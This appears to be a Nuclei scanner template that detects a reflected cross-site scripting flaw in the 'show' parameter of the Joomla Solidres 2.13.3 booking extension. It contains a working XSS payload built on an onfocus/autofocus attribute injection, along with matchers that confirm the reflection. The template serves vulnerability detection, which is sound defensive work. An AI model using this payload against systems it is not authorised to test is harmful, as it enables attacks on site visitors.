30 lines
1022 B
YAML
30 lines
1022 B
YAML
|
id: joomla-solidres-xss
|
||
|
|
||
|
info:
|
||
|
name: Joomla Solidres 2.13.3 - Cross-Site Scripting
|
||
|
author: r3Y3r53
|
||
|
severity: medium
|
||
|
description: |
|
||
|
Joomla extension for Solidres - Online Booking System & Reservation Software is vulnerable to XSS in GET parameter 'show'.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/51638
|
||
|
- https://cxsecurity.com/issue/WLB-2023070080
|
||
|
- https://cyberlegion.io/joomla-solidres-2-13-3-cross-site-scripting/
|
||
|
metadata:
|
||
|
verified: true
|
||
|
max-request: 1
|
||
|
tags: xss,joomla,unauth
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=db8ck%22onfocus=%22confirm(document.domain)%22autofocus=%22xwu0k"
|
||
|
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'contains(body, "confirm(document.domain)") && contains(tolower(body), "joomla")'
|
||
|
- 'contains(content_type, "text/html")'
|
||
|
- 'status_code == 200'
|
||
|
condition: and
|